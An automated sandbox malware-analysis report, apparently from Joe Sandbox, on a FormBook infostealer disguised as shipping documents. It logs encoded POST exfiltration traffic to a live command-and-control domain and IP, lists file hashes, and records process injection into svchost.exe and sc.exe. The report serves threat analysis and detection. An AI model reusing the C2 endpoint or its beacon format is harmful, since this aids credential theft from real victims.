Dec 9, 2024 17:19:27.750607014 CET	801	OUT	POST /ctta/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.avalanchefi.xyz Origin: http://www.avalanchefi.xyz Referer: http://www.avalanchefi.xyz/ctta/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 197 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30 Data Raw: 48 76 72 54 2d 74 39 58 3d 32 31 4a 4e 4c 4c 52 36 6e 57 4c 77 78 77 6f 46 73 7a 6c 46 6f 47 6d 43 66 4a 35 68 31 73 50 56 34 52 30 70 58 49 61 6b 31 64 4d 34 55 77 63 6f 48 6b 6c 62 76 30 6a 73 46 7a 32 39 70 33 52 73 72 6e 5a 6e 61 41 59 62 4e 36 72 74 31 74 67 36 42 79 65 57 46 48 36 53 70 31 64 55 6a 72 79 5a 32 6a 6b 41 75 56 75 50 69 78 68 6c 64 6a 6a 36 36 42 38 33 5a 6a 35 38 72 6c 6d 36 56 43 37 44 68 45 73 49 47 64 36 48 6d 41 51 38 35 7a 6c 76 75 61 4c 67 36 4f 52 56 42 4f 76 48 49 74 58 63 75 66 73 4f 53 42 6c 2b 52 36 4b 64 45 59 34 46 77 35 62 68 33 42 6c 4c 50 34 6a 43 Data Ascii: HvrT-t9X=21JNLLR6nWLwxwoFszlFoGmCfJ5h1sPV4R0pXIak1dM4UwcoHklbv0jsFz29p3RsrnZnaAYbN6rt1tg6ByeWFH6Sp1dUjryZ2jkAuVuPixhldjj66B83Zj58rlm6VC7DhEsIGd6HmAQ85zlvuaLg6ORVBOvHItXcufsOSBl+R6KdEY4Fw5bh3BlLP4jC
Dec 9, 2024 17:19:28.863708973 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49970	13.248.169.48	80	6064	C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 17:19:30.422883987 CET	825	OUT	POST /ctta/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.avalanchefi.xyz Origin: http://www.avalanchefi.xyz Referer: http://www.avalanchefi.xyz/ctta/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 221 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30 Data Raw: 48 76 72 54 2d 74 39 58 3d 32 31 4a 4e 4c 4c 52 36 6e 57 4c 77 2b 7a 67 46 72 51 4e 46 6a 47 6d 42 51 70 35 68 76 63 50 52 34 52 49 70 58 4a 50 76 30 76 59 34 56 52 73 6f 41 68 52 62 73 30 6a 73 4f 54 33 33 32 6e 52 72 72 6e 56 56 61 42 6b 62 4e 36 76 74 31 75 30 36 41 46 43 58 48 58 36 51 79 6c 64 61 74 4c 79 5a 32 6a 6b 41 75 56 72 48 69 78 35 6c 42 44 54 36 37 67 38 30 48 7a 35 2f 6f 6c 6d 36 52 43 37 48 68 45 73 2b 47 59 69 70 6d 46 4d 38 35 33 70 76 75 4c 4c 76 77 4f 52 66 50 75 75 57 50 49 76 58 70 63 6b 4e 4b 6e 6c 38 4b 5a 43 41 4b 5a 45 62 68 4c 53 36 69 57 6c 73 49 66 71 71 59 6c 2b 71 2f 70 36 70 55 38 4c 66 5a 30 2b 67 6d 78 71 42 6c 51 3d 3d Data Ascii: HvrT-t9X=21JNLLR6nWLw+zgFrQNFjGmBQp5hvcPR4RIpXJPv0vY4VRsoAhRbs0jsOT332nRrrnVVaBkbN6vt1u06AFCXHX6QyldatLyZ2jkAuVrHix5lBDT67g80Hz5/olm6RC7HhEs+GYipmFM853pvuLLvwORfPuuWPIvXpckNKnl8KZCAKZEbhLS6iWlsIfqqYl+q/p6pU8LfZ0+gmxqBlQ==
Dec 9, 2024 17:19:31.507752895 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.9	49977	13.248.169.48	80	6064	C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 17:19:33.256982088 CET	1838	OUT	POST /ctta/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.avalanchefi.xyz Origin: http://www.avalanchefi.xyz Referer: http://www.avalanchefi.xyz/ctta/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 1233 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30 Data Raw: 48 76 72 54 2d 74 39 58 3d 32 31 4a 4e 4c 4c 52 36 6e 57 4c 77 2b 7a 67 46 72 51 4e 46 6a 47 6d 42 51 70 35 68 76 63 50 52 34 52 49 70 58 4a 50 76 30 76 41 34 55 6a 6b 6f 47 47 4e 62 74 30 6a 73 53 44 33 36 32 6e 51 75 72 6e 4d 63 61 42 6f 68 4e 34 6e 74 30 4d 73 36 49 55 43 58 4e 58 36 51 74 31 64 58 6a 72 79 32 32 6e 49 4d 75 56 37 48 69 78 35 6c 42 41 4c 36 79 52 38 30 46 7a 35 38 72 6c 6d 6d 56 43 36 53 68 45 30 41 47 5a 57 58 6d 78 41 38 35 58 35 76 39 74 66 76 7a 75 52 5a 43 4f 75 4f 50 49 71 50 70 59 38 33 4b 6e 35 61 4b 5a 71 41 4c 76 42 59 32 37 61 47 2b 57 31 64 46 66 62 4e 41 77 33 50 77 4b 50 72 4a 4a 72 39 42 52 58 30 6f 77 2f 79 2b 2b 58 41 76 32 4d 63 5a 6d 54 37 63 4d 68 53 61 35 4d 6e 48 64 76 73 73 5a 6e 62 6d 4b 74 2f 68 45 33 53 58 4e 74 2b 53 78 6f 43 74 76 58 59 62 4c 68 44 4a 61 37 51 67 63 56 39 74 4c 41 49 34 56 4e 77 6e 45 4a 48 76 76 71 2f 34 33 32 70 70 49 35 6e 69 31 62 58 51 31 53 46 45 65 59 78 37 56 77 75 45 4c 51 4e 38 4b 55 6f 52 37 6d 69 4e 7a 43 75 54 6b 62 44 6a [TRUNCATED] Data Ascii: HvrT-t9X=21JNLLR6nWLw+zgFrQNFjGmBQp5hvcPR4RIpXJPv0vA4UjkoGGNbt0jsSD362nQurnMcaBohN4nt0Ms6IUCXNX6Qt1dXjry22nIMuV7Hix5lBAL6yR80Fz58rlmmVC6ShE0AGZWXmxA85X5v9tfvzuRZCOuOPIqPpY83Kn5aKZqALvBY27aG+W1dFfbNAw3PwKPrJJr9BRX0ow/y++XAv2McZmT7cMhSa5MnHdvssZnbmKt/hE3SXNt+SxoCtvXYbLhDJa7QgcV9tLAI4VNwnEJHvvq/432ppI5ni1bXQ1SFEeYx7VwuELQN8KUoR7miNzCuTkbDjtjsdUnbNMpI7+8eEh6/caPMVT9PYqgvhs0k5R6Hdwy7SGmpYbX8oNXCN2behocbhBzeDzSo4Fz1PgvmSX69iX/KOWQn5T6pvgMyTlg+MQ1Qw9xE9MIKdfjiyuEV5uBWCzMewgK+cXMhnemG/TOeAUPGs+FH0sxATmnM3CSZ4e/AU39BY+PsAVfAfcExqgRCoug7e2X2T44WjdYBxywaVe9hROW//ZUgVZOpzZqTYxEPDUdyTlniPdqPxNXrag+/bxNP5UiV6UlpTc5fvrg0MW2S3rsRAG1CG8swC8Lzt8xPUkVLzi/AwXFG1uq6eF19n6UtYyeEaw0KrVq4/2UsSGxokSfZxFeXeE9BII7nj+zGSGi7ffpcS5op6fJjN4RGyOKfUc7V+uPwijn/ikLeZIAh+Gw4Ut/+zX0SYJyw7eLCxlZcpNgxrJyqR6jXXT5CS5ynmU+ceC4/Cj3+tuOmB8lS9rRIUf1FHk0McoDw6I5v5qEWNx9LZfFtHE9vdhR4xTlNbQ6AqO4PbOELeuntY3gVCojR3Iz8Lfe69uKNfwuN1TatfCAmYKBhGI2TH1m84K4apz6QHYzYnIKKz9cmU8HJs4fxsa+0u5cdLldhc25mv0UVIirB6q73FOaPjC9zkhVYOVVKwM0kvJL9wMhP3DT0dVYJq7arR3H [TRUNCATED]
Dec 9, 2024 17:19:34.338342905 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.9	49983	13.248.169.48	80	6064	C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 17:19:35.914987087 CET	538	OUT	GET /ctta/?tJ=iJE0gvFHj8PDX8qP&HvrT-t9X=73htI/07lnbi6jhigENtqW+dHv4h0dKivRRSV4arkt57XDlKC2xJvna+Jje1nWd5k0Z3PS0VVZTw4ek7NFPoKT3ngGEEhsGl0ikPp1D77RlGeR3ylg== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.avalanchefi.xyz Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Dec 9, 2024 17:19:37.014415026 CET	381	IN	HTTP/1.1 200 OK content-type: text/html date: Mon, 09 Dec 2024 16:19:36 GMT content-length: 260 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 74 4a 3d 69 4a 45 30 67 76 46 48 6a 38 50 44 58 38 71 50 26 48 76 72 54 2d 74 39 58 3d 37 33 68 74 49 2f 30 37 6c 6e 62 69 36 6a 68 69 67 45 4e 74 71 57 2b 64 48 76 34 68 30 64 4b 69 76 52 52 53 56 34 61 72 6b 74 35 37 58 44 6c 4b 43 32 78 4a 76 6e 61 2b 4a 6a 65 31 6e 57 64 35 6b 30 5a 33 50 53 30 56 56 5a 54 77 34 65 6b 37 4e 46 50 6f 4b 54 33 6e 67 47 45 45 68 73 47 6c 30 69 6b 50 70 31 44 37 37 52 6c 47 65 52 33 79 6c 67 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?tJ=iJE0gvFHj8PDX8qP&HvrT-t9X=73htI/07lnbi6jhigENtqW+dHv4h0dKivRRSV4arkt57XDlKC2xJvna+Jje1nWd5k0Z3PS0VVZTw4ek7NFPoKT3ngGEEhsGl0ikPp1D77RlGeR3ylg=="}</script></head></html>

Target ID:	0
Start time:	11:17:34
Start date:	09/12/2024
Path:	C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe"
Imagebase:	0x9a0000
File size:	1'214'976 bytes
MD5 hash:	825D275E4BA1C2DA11BDC94259B23C21
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Target ID:	2
Start time:	11:17:37
Start date:	09/12/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe"
Imagebase:	0x6d0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2016788677.0000000003350000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2017207373.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2016510291.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Target ID:	6
Start time:	11:18:33
Start date:	09/12/2024
Path:	C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe"
Imagebase:	0xc70000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2584635635.0000000002A20000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Target ID:	7
Start time:	11:18:35
Start date:	09/12/2024
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\sc.exe"
Imagebase:	0x9f0000
File size:	61'440 bytes
MD5 hash:	D9D7684B8431A0D10D0E76FE9F5FFEC8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2584855517.0000000003750000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2584715136.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2583125879.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Target ID:	8
Start time:	11:18:48
Start date:	09/12/2024
Path:	C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe"
Imagebase:	0xc70000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2586189448.0000000005440000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Target ID:	10
Start time:	11:19:00
Start date:	09/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff73feb0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true